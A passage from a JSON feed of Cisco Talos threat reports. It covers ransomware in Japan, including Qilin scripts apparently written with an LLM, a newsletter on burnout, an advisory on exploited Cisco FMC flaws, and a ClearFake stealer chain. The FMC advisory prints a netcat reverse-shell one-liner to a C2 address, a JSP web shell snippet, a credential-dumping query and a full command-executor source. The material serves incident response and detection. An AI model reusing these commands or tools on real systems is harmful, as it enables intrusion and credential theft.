operation or at the end of each work phase, the threat actor deleted credential dumps, scan results, Responder-related files, pivoting tools, and temporary files stored on the attacker-controlled server. As shown in Figure 11, the command history contains evidence of deletion activities such as the following: Figure 11. Deletion of credential dumps and related files.In addition, as shown in Figure 12, we found that The Gentlemen uses the open-source AdaptixC2 framework for command-and-control (C2) operations. Figure 12. Use of AdaptixC2.AdaptixC2 is a C2 post-exploitation framework designed for penetration testing and red team operations. However, The Gentlemen may be using it in real-world attacks. The tool can also be extended through agents, listeners, and scripts. In addition, it supports multiple communication protocols, including HTTP/S, DNS/DoH, and SMB, making it adaptable to various network environments. Due to this flexibility, AdaptixC2 can be useful not only for legitimate red team operations but also for malicious actors. Figure 13. AdaptixC2 interface (source: AdaptixC2).AttributionAmong these traces, we discovered a Bash script. The tool itself is relatively simple, periodically sending ping requests to a specified IP address and logging whether the host is reachable. However, we identified Russian-language comments within the script. Figure 14. Keepalive tool.Additionally, the contents of the .bash_history file left in the attacker&#x2019;s environment contained &#x201c;&#x446;&#x440;&#x449;&#x444;&#x44c;&#x448;&#x201d; (whoami), &#x201c;&#x434;&#x44b;&#x201d; (ls), &#x201c;&#x448;&#x437; &#x444;&#x201d; (ip a), &#x201c;&#x441;&#x434;&#x443;&#x444;&#x43a;&#x201d; (clear), and &#x201c;&#x443;&#x448;&#x435;&#x201d; (exit). This suggests that the attacker may have been using a Russian keyboard layout, indicating the possibility that a Russian-speaking individual was involved in the attack. As The Gentlemen is suspected to be led by individuals based in Russia, this further supports the connection to the group. Figure 15. Contents of the .bash_history File (excerpt).Indications of generative AI use found in Qilin&#x2019;s open directoryWhen we investigated the environment affected by the Qilin attack, Talos identified several characteristics in Python scripts found in an open directory used by Qilin that suggest, with medium-to-high confidence, that scripts may have been generated using AI. Figure 16 shows part of a Python script named &#x201c;deadman.py&#x201d;. This tool deploys destructive actions to multiple machines in a Windows/Active Directory environment at a specified time and centrally manages their status. The do_gpo function shown in Figure 16 uses an AD Group Policy Object (GPO) to deploy the wiper broadly across Windows machines within the domain. This function uses Active Directory Group Policy Objects (GPOs) to deploy a wiper across Windows endpoints within the domain. The code also contains comments such as # Stage wipe payload to SYSVOL, # Stage startup script, and # Create GPO via PowerShell on DC, suggesting that an LLM may have structured the overall process as a workflow: (1) Stage the payload &#x2192; (2) Stage the startup script &#x2192; (3) Create the GPO. Figure 16. Distribution of scripts using GPOs (excerpt).Figure 17 shows an excerpt from &#x201c;veeam_kill.py&#x201d;, a Python script designed to stop, disable, and destroy Veeam backups. As shown in Figures 17 and 18, the main() function clearly divides the overall process into four stages, labeled &#x201c;Step 1&#x201d; through &#x201c;Step 4,&#x201d; with comments and progress logs provided at a consistent level of detail for each step. Figure 17. Process for deleting Veeam backup data and shadow copies (excerpt).Figure 18. Comments and progress logs suggesting LLM-generated code (excerpt).We also identified traces of code that appears to have been generated by an LLM in &#x201c;deploy_locker.py&#x201d;, a script used to distribute and execute ransomware across multiple endpoints. As shown in Figure 19, the script begins with documentation-style text describing the tool&#x2019;s purpose, prerequisites, and usage examples, a format commonly seen when an LLM generates code from a given specification. In addition, as observed in the code discussed above, the script also contains comments that explain the processing flow step by step. Figure 19. &#x201c;deploy_locker.py&#x201d;, believed to have been generated by an LLM (excerpt).As shown in Figure 20, a portion of the &#x201c;.bash_history&#x201d; file also contains a history of commands used to inspect the contents of a directory associated with a tool named llm_chatbot, which appears to be related to LLM-based generation. Figure 20. Contents of the &#x201c;.bash_history&#x201d; file (excerpt).Measures to prevent intrusionsOur investigation found that vulnerabilities and misconfigurations in VPNs, remote access environments, and network devices were prominent initial access vectors. Talos also identified multiple cases in which threat actors gained access to internal networks by abusing stolen credentials or legitimate accounts. Therefore, managing internet-accessible devices and services and protecting credentials remain top priorities. First, organizations should regularly inventory internet-accessible devices and services, including VPNs and remote desktop services. Unused devices and functions should be disabled, vulnerability advisories should be monitored continuously, and security patches should be applied promptly. Devices that are no longer supported should also be replaced in a planned manner. Restricting access to management interfaces by source IP address and minimizing the externally accessible attack surface are also effective measures. To prevent the abuse of credentials, organizations should implement multi-factor authentication (MFA) for VPNs, cloud services, remote desktop services, and administrative accounts. Shared accounts and accounts that have not been used for extended periods should also be reviewed, while accounts used for routine work should be separated from those used for administrative tasks. Administrative privileges should be limited to the minimum necessary. Monitoring logins from unusual locations or at unusual times, as well as suspicious account creation, can also help detect the misuse of credentials at an early stage. Because incidents involving third-party vendors, subsidiaries, and cloud environments were also observed, access controls should extend beyond the organization&#x2019;s own environment to cover external organizations and services. Access granted to vendors and other third parties should be limited to the minimum necessary and restricted to a defined period. Organizations should also enforce multifactor authentication and retain connection logs to reduce the risk of intrusion through third-party environments. Subsidiaries and overseas locations should be encouraged to manage vulnerabilities and accounts according to the same standards as the headquarters. Meanwhile, there were also cases in which the initial access vector could not be determined. In addition to implementing preventive measures, organizations should establish processes for retaining the records required for post-incident investigations. To limit the spread of an attack, it is also effective to use EDR and other security tools to monitor activities such as suspicious remote access, the acquisition of administrative privileges, the disabling of backup functions, and large-scale file modifications. Our investigation indicates that combining vulnerability management for internet-facing assets, credential protection, and access controls that extend to third-party vendors can provide effective protection. Rather than focusing solely on preventing every intrusion, organizations should also establish systems that enable them to detect attacks at an early stage and limit the impact if an intrusion occurs. CoverageThe following SNORT&#xae; rules (SIDs) detect and block this threat: Snort 2: 1:67111Snort 3: 7:29","cveId":null,"cvssScore":null,"cvssVector":null,"severity":"unknown","vendor":null,"product":null,"affectedVersions":[],"cwes":[],"tags":["talos","threat-research","cisco","ransomware","threat-spotlight","cisco-talos-malware-protection","cisco-talos-network-intrusion-prevention","geo:inferred"],"relatedCves":["CVE-2025-2479","CVE-2025-24799","CVE-2020-1472"],"titleFingerprint":"2026-evidence-first-gentlemen-half-incidents-infrastructure-investigation-japan-qilin-ransomware-use","countryCodes":["JP","PH","RU","TW","US"],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.talosintelligence.com/ransomware-incidents-in-japan-in-the-first-half-of-2026/","type":"report","title":"Cisco Talos: Ransomware incidents in Japan in the first half of 2026: Investigation of The Gentlemen’s infrastructure and evidence of Qilin's AI use"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-17T10:00:43.000Z","addedAt":"2026-09-17T10:52:54.930Z","updatedAt":"2026-09-17T10:52:54.930Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[]},{"id":"afda5d9b-069f-44f5-96d1-8d00be9a1feb","slug":"talos-we-ve-got-one-word-for-it-and-it-s-usually-the-wrong-one-e5e8a691","externalId":"6aa1b1fa1aab0c0001cec6d2","source":"Cisco Talos","sourceType":"vendor-rss","type":"security-news","title":"We've got one word for it, and it's usually the wrong one","description":"Welcome to this week&#x2019;s edition of the Threat Source newsletter.&#xA0; Ask anybody in this industry what the work does to the health of the people who do it and you get one word back: burnout. It&apos;s a fine word, in and of itself. It&#x2019;s easy to reach for, understandable to everyone&#x2026; and it&apos;s the wrong one, most of the time.&#xA0; So, story time. Last year I gave an interview with the amazing Hazel Burton about VPNFilter, and my run-in with burnout. I was a manager during that time, and it took a toll on me and on the people around me, and when it was over I didn&apos;t have language for what had happened. Neither did my peers. Neither did my leadership. Nobody was withholding help from me&#x2026; we just didn&apos;t have the words.&#xA0;&#xA0; Enter this summer, and I was afforded a unique opportunity to mentor some MBA students on burnout in cybersecurity. I know a thing or two about it, so I leapt at a chance to share and help grow future leaders. But I decided I was going to do more than share and relieve my experiences in this industry &#x2013; I wanted to give back to them and the security industry. So, I fell down a fascinating and revealing research hole and learned better words to describe my experiences over my career.&#xA0; I spent my summer reviewing trauma case studies, clinical and academic literature on trauma in career fields like first responders, doctors, social workers, and the military. There are many decades of research focusing on trauma in those fields. Subsequently, my brain is packed full of better words! For example, burnout is exhaustion from chronic workload, and it eases when the load eases. We know this one well. Secondary traumatic stress is what absorbing somebody else&apos;s trauma does to you, and it looks like trauma. Think the CTI analyst exposed to horrible things on the dark web. Vicarious trauma is what years of other people&apos;s worst days do to how you see the world. It changes your beliefs, not your mood. Work in cybersecurity long enough, and it can pile up on your views. Moral injury is the damage from being made to act against your own values, or stopped from doing what you knew was right. This one can affect anyone who&#x2019;s ever owned an outcome, but not the decision, and that&#x2019;s common in this industry.&#xA0; One word, four injuries, and four different fixes. All of them are present in the industry that is cybersecurity. The problem? We&#x2019;re just a young industry. Compared to medical, helping professions, or social workers, we&#x2019;re incredibly immature with understanding the consequences of the work and the toll it takes on us. Next week I&#x2019;ll be revealing my research and a peer-deployable framework to help others process, cope, and respond in healthy ways to keep us all in a better mental space, and staying in this good fight of protecting others.&#xA0;&#xA0; I&apos;m still not good at this. I&apos;m writing it all down because I was bad at it in a way that cost me something. There&apos;s more of this in my talk at CYBR.SEC.CON next week if you&apos;re in Houston.&#xA0; Go ask somebody how they&apos;re doing and wait for the answer. Be present for them. It matters.&#xA0;&#xA0; Take care of yourselves, and take care of each other.&#xA0; The one big thing &#xA0;Cisco Talos is disclosing a complex WebDAV infection chain discovered after investigating an incident at a Ukrainian government organization. Attributed to a Russian threat actor tracked as UAT-10820, the campaign delivers the Amatera stealer alongside secondary payloads like ZigCryptoStealer and NetSupport Manager. Despite the high-profile initial victim, we assess with moderate confidence that this is an opportunistic, broad-based cryptocurrency and credential-stealing operation rather than a highly targeted attack.&#xA0; Why do I care?&#xA0;Threat actors are getting really creative with their delivery mechanisms and evasion tactics. By abusing legitimate infrastructure like the BNB Smart Chain for bulletproof hosting and leveraging fake CAPTCHA prompts, attackers can easily bypass traditional web filters. Additionally, the secondary payloads pack a serious punch. The inclusion of a vulnerable driver to terminate EDR software and the deployment of unauthorized remote access tools give attackers deep, persistent control over infected systems.&#xA0; So now what?&#xA0;Security teams should monitor for unusual WebDAV activity and the execution of disguised DLLs through \"rundll32.exe\" using suspicious ordinal calls. Make sure to educate your users on the dangers of copying and pasting commands from fake verification prompts. Since the Amatera payload often resides entirely in memory, defenders should also ensure their endpoint solutions are configured for robust memory scanning. Finally, you can find a comprehensive list of indicators of compromise (IOCs) in the full blog.&#xA0; Top security headlines of the week&#xA0;New Microsoft Defender &apos;ShieldCrash&apos; zero-day grants SYSTEM access&#xA0; An anonymous security researcher known as Nightmare Eclipse has released a new Microsoft Defender zero-day exploit named \"ShieldCrash\" right after Microsoft rolled out its September 2026 Patch Tuesday security updates. (Bleeping Computer)&#xA0; North Korean hackers deploy new Linux espionage toolkit&#xA0; The stealthy toolkit embeds a backdoor in HAProxy and targets automotive and media organizations in South Korea for long-term surveillance. The toolkit supports remote command execution, credential harvesting, and script injection into web traffic. (SecurityWeek)&#xA0; Attackers use multi-hop Google redirects for phishing campaign&#xA0; What sets this campaign apart is that in order to bypass gateways, email filters, and other security tools, the link relies on a chain of redirects across Google domains, intending for link inspectors to see multiple Google domains and let the URL through. (DarkReading)&#xA0; OpenAI agents took over Wiki site before Hugging Face attack&#xA0; A team of independent researchers revealed the parallel incident on Sept. 4, which was first reported by Reuters, affecting a largely defunct German language wiki for programmers called &#x201C;DeutschesSoftwareEntwickler wiki.&#x201D; (DarkReading)&#xA0; Can&#x2019;t get enough Talos?&#xA0;Patch Tuesday for September 2026&#xA0; Microsoft has released its monthly security update for September 2026, which includes 973 vulnerabilities affecting a range of products, including 113 that Microsoft marked as \"critical.\"&#xA0; Active exploitation of Cisco Secure Firewall Management Center vulnerabilities&#xA0; Cisco Talos is actively tracking the exploitation of two vulnerabilities in Cisco&#x2019;s Secure Firewall Management Center (FMC) Software: CVE-2026-20079 and CVE-2026-20316. Customers are strongly advised to apply hotfixes for affected software versions already released by Cisco.&#xA0; ClickFix moves into the browser: Cryptocurrency theft with Google-hosted C2&#xA0; Cisco Talos is tracking a cryptocurrency-stealing campaign that abuses the Google Visualization API for command and control (C2), retrieving obfuscated JavaScript from a publicly published Google Sheets document and injecting it into the victim&apos;s browser session.&#xA0; Browser betrayal: When your tabs turn against you&#xA0; Security Engineer Sean Gallagher joins Amy to break down a scam where threat actors are weaponizing greed to turn amateur cybercriminals against themselves. While this current operation mostly targets the amateur dark-web circuit, the underlying use of the Google Visualization API as a command-and-control channel is a red flag for the future of web security.&#xA0; Upcoming events where you can find Talos&#xA0;.conf26 (Sept. 14 &#x2013; 17) Denver, CO&#xA0;CYBR.SEC.CON. (Sept. 15 &#x2013; 16) Houston, TX&#xA0;LABSCon (Sept. 16 &#x2013; 19) Scottsdale, AZ&#xA0;VB (Oct. 14 &#x2013; 16) Seville, Spain&#xA0;CAMLIS (Oct. 21 &#x2013; 23) Arlington, VA&#xA0;Most prevalent malware files from Talos telemetry over the past week&#xA0;SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 &#xA0; MD5: 2915b3f8b703eb744fc54c81f4a9c67f &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507&#xA0; Example Filename: VID001.exe &#xA0; Detection Name: W32.9F1F11A708-100.SBX.TG**&#xA0; SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 &#xA0; MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59&#xA0; Example Filename: tmp00055df5.dll &#xA0; Detection Name: Auto.90B145.282358.in02&#xA0; SHA256: c4dd71e347a076ba24bdd2d0ee532ef991c1ef25a2431a19f850942ba2ab16b2&#xA0; MD5: 9a47c4d379998ade2f8f99e23a630c06 &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=c4dd71e347a076ba24bdd2d0ee532ef991c1ef25a2431a19f850942ba2ab16b2&#xA0; Example Filename: sample.exe&#xA0; Detection Name: W32.C4DD71E347-95.SBX.TG&#xA0; SHA256: 9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f&#xA0; MD5: 38de5b216c33833af710e88f7f64fc98&#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f&#xA0; Example Filename: SECOH-QAD.exe &#xA0; Detection Name: Win.Tool.Procpatcher::1201&#xA0; SHA256: 5bb86c1cd08fe5e1516cba35c85fc03e503bd1b5469113ffa1f1b9e10897f811 &#xA0; MD5: f3e82419a43220a7a222fc01b7607adc&#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=5bb86c1cd08fe5e1516cba35c85fc03e503bd1b5469113ffa1f1b9e10897f811&#xA0; Example Filename: 5bb86c1cd08fe5e1516cba35c85fc03e503bd1b5469113ffa1f1b9e10897f811.exe &#xA0; Detection Name: Win.Dropper.Suloc::1201&#xA0;","cveId":null,"cvssScore":null,"cvssVector":null,"severity":"unknown","vendor":null,"product":null,"affectedVersions":[],"cwes":[],"tags":["talos","threat-research","cisco","threat-source-newsletter","geo:inferred"],"relatedCves":["CVE-2026-20079","CVE-2026-20316"],"titleFingerprint":"got-one-usually-word-wrong","countryCodes":["DE","ES","KP","KR","RU","UA"],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.talosintelligence.com/weve-got-one-word-for-it-and-its-usually-the-wrong-one/","type":"report","title":"Cisco Talos: We've got one word for it, and it's usually the wrong one"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-10T18:00:15.000Z","addedAt":"2026-09-10T18:52:52.822Z","updatedAt":"2026-09-10T18:52:52.822Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[]},{"id":"069d21a7-a865-4007-b327-0c714c4cb400","slug":"talos-active-exploitation-of-cisco-secure-firewall-management-center-d7dd2300","externalId":"6a7b679c84f2640001d1562b","source":"Cisco Talos","sourceType":"vendor-rss","type":"security-news","title":"Active exploitation of Cisco Secure Firewall Management Center vulnerabilities","description":"Cisco Talos is actively tracking the exploitation of two vulnerabilities in Cisco&#x2019;s Secure Firewall Management Center (FMC) Software. First, CVE-2026-20079 is an authentication bypass vulnerability in unpatched instances of Cisco&#x2019;s Secure FMC Software, which allows an unauthenticated, remote attacker to bypass authentications and execute scripts on impacted devices to obtain root access to the underlying operating system. Second, CVE-2026-20316 is a vulnerability that allows a remote attacker to log in using a low-privileged account. CVE-2026-20079 is a critical vulnerability with a CVSS score of 10.0. Customers are strongly advised to follow Cisco&#x2019;s guidance provided in the security advisory and apply the security patches previously made available. CVE-2026-20316 has a CVSS score of 5.3, however it can be used with other Cisco Secure FMC vulnerabilities to elevate privileges. Due to Talos identifying in the wild abuse of these CVE&#x2019;s, customers are strongly advised to apply hotfixes for affected software versions already released by Cisco for CVE-2026-20079 and CVE-2026-20316. A comprehensive hardening release consisting of these hotfixes along with other internally discovered vulnerabilities will be released next week (Week of September 14th). Talos&#x2019; analysis illustrates three clusters of post-compromise activity on FMC instances associated with state-sponsored and crimeware threat actors, as described below. The first cluster which we track as UAT-12197, involves the exploitation of CVE-2026-20079, leading to the deployment of web shells, a Java Archive (JAR)-based command executor, and credential exfiltration. The second intrusion cluster, which we attribute to UAT-11823, consisted of the exploitation of CVE-2026-20079 and CVE-2026-20316, leading to the deployment of a Netcat-based reverse shell and proxy tooling, ultimately leading to the deployment of a variant of the Cyclops Blink malware, previously attributed to the Russian APT Sandworm by the United States and United Kingdom. Talos is further disclosing a third cluster of malicious activity on an FMC instance, attributed to UAT-11988, who we assess with high confidence is a ransomware operator. The preliminary stages of the attack entailed the threat actor gaining access to the system via static credentials (CVE-2026-20316) and then abusing legitimate built-in FMC tooling in living-off-the-land (LOTL) fashion to conduct extensive reconnaissance of the victim&#x2019;s environment, deploy tunneling tools to maintain network access, harvest credentials, and build a target list of endpoints to encrypt/lock. Subsequent actions and tactics, techniques, and procedures (TTPs) the threat actor used in the victim&#x2019;s environment were consistent with those of Qilin ransomware affiliates. Cluster #1: UAT-12197This cluster of activity involved the successful exploitation of CVE-2026-20079 and the subsequent placement of a malicious web shell in the CSM Tomcat webroot directory. The web shell is JSP-based and Base64 decodes a parameter labelled &#x201C;F6C1F0E7&#x201D;, consisting of the class name to load in the JAVA process: String cls = request.getParameter(\"F6C1F0E7\"); if (cls != null) { new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response}); } The web shell was used to place a malicious JAR file in the same directory. The threat actors used the JAR file (named &#x201C;cmd[.]jar&#x201D;) to query the compromised systems&#x2019; internal databases to obtain user authentication data and credentials: /var/jre/bin/java -jar cmd.jar &apos;/var/sf/bin/OmniQuery.pl -db mdb -e \\&apos;SELECT name, auth_data FROM users;\\&apos;&apos; The JAR file is basically a command executor that obtains the command to be executed from its command line and executes it using /bin/sh -c <command>. import java.io.BufferedReader; import java.io.InputStreamReader; public class Poc { public static void main(String[] args) { if (args.length == 0) { System.out.println(\"Usage: java -jar exploit.jar \"command_to_execute\"\"); System.exit(1); } String command = args[0]; System.out.println(\"--- Executing: \" + command + \" ---\"); try { String[] cmd = { \"/bin/sh\", \"-c\", command }; ProcessBuilder pb = new ProcessBuilder(cmd); pb.redirectErrorStream(true); Process process = pb.start(); BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream())); String line; while ((line = reader.readLine()) != null) { System.out.println(line); } int exitCode = process.waitFor(); System.out.println(\"--- Exit Code: \" + exitCode + \" ---\"); } catch (Exception e) { System.out.println(\"Error:\"); e.printStackTrace(); } } } Cluster #2: UAT-11823Talos attributes this cluster of activity to UAT-11823, an advanced persistent threat (APT) actor, with high confidence. UAT-11823 overlaps in tooling with the Sandworm APT actor. The threat actor obtained initial access to compromised systems by either exploiting CVE-2026-20079 or via static credentials. After obtaining access, UAT-11823 subsequently updated the &#x201C;license.tmp&#x201D; file on disk (using Makeself) with a malicious copy to establish a Netcat-based reverse shell to their own command-and-control (C2) server: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 208[.]123[.]119[.]215 3090 >/tmp/f This license file essentially acted as a Makeself package that was then executed via the installation process (as root) by the &#x201C;package_info[.]pl&#x201D; utility: /usr/local/sf/bin/package_info.pl /var/tmp/license.tmp --lsm This mechanism of deploying malicious package files is likely an indicator of the exploitation of CVE-2026-20316, a vulnerability that allows a remote attacker to log in using a low-privileged account. Talos assesses with high confidence that the attackers exploited CVE-2026-20079 and CVE-2026-20316. Configuration exfiltrationUAT-11823 also deployed two bash scripts to harvest managed-device configurations. The configurations collected were staged into archives for subsequent exfiltration. Modular ELF implant: Cyclops BlinkThe threat actors downloaded a modular ELF implant from one of their Netcat C2 servers. The ELF-based implant is Cyclops Blink, a malware family previously attributed to Sandworm, a Russian APT actor. This variant of Cyclops Blink consists of the following capabilities: Establish persistence scripts in /etc/init.d/ that execute the implantDNS over HTTPS (DoH) IP resolutionFile administration including downloads and uploadsCredential harvestingArbitrary file and command execution on the compromised systemNetwork scanning and discoveryPacket sniffing (with option filters)Cluster #3: UAT-11988, a Qilin ransomware operatorA third cluster of activity entailed a ransomware operator (tracked as UAT-11988) logging into an FMC device with static credentials (CVE-2026-20316), performing extensive reconnaissance, domain enumerations, credential theft, and building a list of target endpoints within the compromised organization for encryption. The threat actor also staged a SOCKS proxy and reverse-SSH tunnel to forward ports from internal hosts back to their own infrastructure. Once all these preliminary actions were completed, the operator began conducting additional probes within the compromised network, deploying antivirus (AV) killers and ultimately the Qilin ransomware family. Instrumenting operations via package_info.plAfter successfully accessing the device, the threat actor abused the legitimate utility &#x201C;package_info.pl&#x201D; to execute an attacker-crafted malicious &#x201C;license[.]tmp&#x201D; file with root privileges. The malicious file consisted of commands to run on the system to conduct extensive reconnaissance in the victim organization&#x2019;s environment: Host names, IP addresses, directory listingsActive Directory (AD) service-accounts credentials, MySQL account credentialsDomain account information exfiltrationComputer object listsHostname to IP mappings spanning domain controllers, ADFS, exchanges, file servers, database servers, etc.All the information collected was staged into already accessible files on the FMC server and was exfiltrated by the threat actor using HTTP GET requests. Tunneling into the compromised organizationOnce extensive reconnaissance was completed, the threat actor attempted to establish persistent network access into the victim organization using a Python SOCKS5 proxy (socks5.py) and a reverse-SSH tunnel from the FMC back to the attacker&#x2019;s own remote host. The following ports were forwarded: LDPA (389), LDAPS (636), Kerberos (88), SMB (445), NETBIOS (135), and WinRM (5985). Pre-ransomware actions and ransomware deploymentThe threat actor conducted extensive probing of endpoints in the victim&#x2019;s environment, deployed open-source tooling such as impacket, Invoke-TheHash, and custom-made AV killers &#x2014; all followed by the deployment of the Qilin ransomware on selected endpoints. Recommendations and detection guidanceDue to Talos identifying in the wild abuse of these CVE&#x2019;s, customers are strongly advised to apply hotfixes for affected software versions already released by Cisco for CVE-2026-20079 and CVE-2026-20316. A comprehensive hardening release consisting of these hotfixes along with other internally discovered vulnerabilities will be released next week (Week of September 16th). Nonetheless, given the in the wild abuse we strongly recommend that customers apply the referenced hotfixes as soon as possible, pending the hardening release. Customer support is also available by initiating a TAC request. Snort SIDs for CVE-2026-20079: 66075 &#x2013; 66080.Snort SIDs for CVE-2026-20316: 66883.Snort SIDs for the malware: 66960, 66961.Indicators of compromiseIOCs for these threat clusters are also available on our GitHub repository here.&#xA0; IOC Cluster Description B037f45e02a289325a1a5eb0d4db6a9fce9954fd0fdfd07162cb4eb2acbef77d UAT-12197 home[.]jsp &#x2013; web shell. Db491181ece3f319de6567ab6f6daa90c6879911cd890155e6b7d8cc7a1a8c8e UAT-12197 cmd[.]jar &#x2013; JAR-based command executor. 89.34.96[.]56 &#xA0; UAT-11823 NetCat-based reverse shell C2. Cyclop Blink C2. 208.123.119[.]215 UAT-11823 NetCat-based reverse shell C2. 104.218.165[.]253 UAT-11823 Attacker&#x2019;s vulnerability scanner for CVE-2026-20079. 91.214.78[.]118 UAT-11823 NetCat-based reverse shell C2. 6f98add5d1a7729192b6ad8491d85c505c64836f7881742d6b93bd8e3d2fe461 UAT-11823 Cyclops Blink malware. 43.204.2[.]142 UAT-11988 Attacker IP address used to conduct intrusions.","cveId":null,"cvssScore":null,"cvssVector":null,"severity":"unknown","vendor":null,"product":null,"affectedVersions":[],"cwes":[],"tags":["talos","threat-research","cisco","threat-advisory","malware","cisco-talos-malware-protection","cisco-talos-network-intrusion-prevention","cisco-talos-antivirus","landing-page-top-story","geo:inferred"],"relatedCves":["CVE-2026-20079","CVE-2026-20316"],"titleFingerprint":"active-center-cisco-exploitation-firewall-management-secure-vulnerabilities","countryCodes":["GB","RU","US"],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.talosintelligence.com/fmc-ongoing-exploitation/","type":"report","title":"Cisco Talos: Active exploitation of Cisco Secure Firewall Management Center vulnerabilities"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-09T16:08:59.000Z","addedAt":"2026-09-09T16:52:52.515Z","updatedAt":"2026-09-09T16:52:52.515Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[]},{"id":"29b18006-26ab-4dde-a932-2572f4195ac6","slug":"talos-clearfake-webdav-infection-chain-delivers-amatera-stealer-3c066663","externalId":"6a97fbc85b9e1a0001b4e2c6","source":"Cisco Talos","sourceType":"vendor-rss","type":"security-news","title":"ClearFake WebDAV infection chain delivers Amatera stealer, ZigCryptoStealer, and NetSupport Manager","description":"Cisco Talos began an investigation after observing a DLL named \"verification.google\" executing from WebDAV at a Ukrainian government organization. We assess with moderate confidence that the attacks are not targeted at a particular organization, but are a part of a cryptocurrency and credentials-stealing operation using the Amatera stealer as the primary payload.&#xA0;Pivoting around the similar WebDAV behavior led to a second loader named \"pf.ch\" and allowed us to reconstruct its earlier delivery stages. The chain uses a Cloudflare Worker to inject JavaScript code stored on BNB Smart Chain and a ClickFix prompt impersonating Google CAPTCHA, leading to download and execution of Amatera stealer. The chain is likely very similar to what has caused the WebDAV-based execution at the Ukraininan government organization.&#xA0;&#xA0;The two Amatera builds were tasked with different secondary payloads by their respective command-and-control (C2) infrastructure: the \"pf.ch\" loader was instructed to deploy a NativeAOT loader running ZigCryptoStealer and a Go-based reverse proxy, while the \"verification.google\" loader was instructed to install an unauthorized instance of NetSupport Manager.&#xA0;The NetSupport Manager installation contained configuration with the C2 server using an IP address based in Russia. With moderate confidence, we assess that \"verification.google\" branch attack was conducted by a Russian threat actor.&#xA0;&#xA0;&#xA0;In April 2026, Cisco Talos identified an unusual WebDAV DLL execution in endpoint telemetry from a Ukrainian government organization. The remote file was named \"verification.google\" and was launched through the 32-bit version of \"rundll32.exe\". This initial finding led us to two similar delivery chains, two different DLL loaders and two ACR/Amatera stealer payloads. Talos tracks the actor behind the observed \"verification.google\" activity as UAT-10820.&#xA0; Following the initial investigation, we decided to hunt for similar WebDAV and ordinal-execution patterns in an attempt to recover the full infection chain. Using VirusTotal, we were able to identify a full chain from a second DLL loader named \"pf.ch\".&#xA0;&#xA0; These two examples are a part of a wider set of recent campaigns delivering Amatera through different infection chains. In July 2026, Malwarebytes documented fake game and software downloads that used RenPy Loader, MSBuild and EtherHiding before delivering Amatera. Blackpoint Cyber described another fake-verification chain that used a signed Microsoft App-V script, configuration stored in Google Calendar and a payload concealed in a PNG image. Apart from the main payload malware family, we found no common infrastructure or other evidence linking those activities to the chains described in this post.&#xA0; Initial finding in endpoint telemetry&#xA0;The initial event that started the investigation was recorded in April 2026 and it showed an execution of a DLL file through a WebDAV UNC path together with startup of the Windows WebClient service. Apart from the initial command line, we had details of the checksum of the executed DLL but it was not clear what started the execution chain. It was time for hunting in open source intelligence repositories and Talos analytical platform. We wanted to find a similar execution with the similar loader and the payload family and ideally recover the whole infection chain which would likely point to how \"verification.google\" execution was triggered. This lead us to the \"pf.ch\" loader and the chain we discovered.&#xA0;&#xA0; Hunting reveals a second WebDAV delivery chain&#xA0;The \"pf.ch\" sample uses the same combination of WebDAV, a disguised DLL filename and ordinal execution through \"rundll32.exe\". We were also able to recover the full ClickFake related sequence leading to this loader. Figure 1 shows both chains, with dashed elements marking stages that were not directly recovered. With low to medium confidence, we assess that the two delivery chains are identical.&#xA0; Figure 1. Parallel WebDAV infection chains and Amatera secondary payloads.The discovered \"pf.ch\" loader chain was initiated by ClearFake Javascript injected into the content of a compromised site by a malicious Cloudflare worker.&#xA0;&#xA0; The C2 server returned configuration instructing the stealer to download a DLL side-loading package in which a signed Chrome component sideloads a malicious NativeAOT DLL, \"secur32.dll\". The DLL loads ZigCryptoStealer and uses a vulnerable driver to terminate EDR software. A separate x86 shellcode loader with a Go reverse TCP proxy is also downloaded as a secondary payload by the Amatera configuration sent by the C2 server.&#xA0;&#xA0; The secondary payload of the \"verification.google\" branch as instructed by its own C2, is a PowerShell script which attempts to install a sample of NetSupport Manager remote access tool.&#xA0; ClearFake retrieves browser code from BNB Smart Chain&#xA0;The \"pf.ch\" branch begins likely on a compromised website. A Cloudflare Worker injects a malicious JavaScript which queries BNB Smart Chain testnet contract 0x886d310Ac23e05EA705e24E513D19f53793832A9 through \"bsc-testnet-rpc[.]publicnode[.]com\". &#xA0; BNB Smart Chain is a public, Ethereum-compatible blockchain hosting transactions and smart contracts. The actor uses the contract as remotely changeable storage for encoded JavaScript, a technique known as EtherHiding. Based on the operating system of the victim&#x2019;s machine, the JavaScript code retrieves the next stage from the blockchain, which acts as a bulletproof hosting provider for the malicious code. Potent Pages previously documented unauthorized Cloudflare Workers querying the same first stage contract.&#xA0; The initial Javascript code contains routines to check for local and headless browser environments, identifies the operating system, and queries a second contract based on the result of the operation. If the victim is running Windows, it retrieves code from 